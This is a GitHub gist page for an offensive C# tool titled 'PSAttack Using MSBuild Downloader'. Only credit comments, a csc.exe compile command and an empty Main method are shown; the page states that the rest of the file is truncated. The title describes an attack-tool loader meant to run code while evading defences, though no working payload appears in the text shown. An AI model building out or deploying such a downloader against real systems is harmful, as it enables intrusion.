-
-
Save cryptonic01/2cc7493ac310e51d02ef47e64f21272d to your computer and use it in GitHub Desktop.
PSAttack Using MSBuild Downloader
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371" | |
| //Based on Jared Haight work (https://github.com/jaredhaight/PSAttack) | |
| //1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs" | |
| using System; | |
| using System.Reflection; | |
| namespace PSA64 | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
View raw
(Sorry about that, but we can’t show files that are this big right now.)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment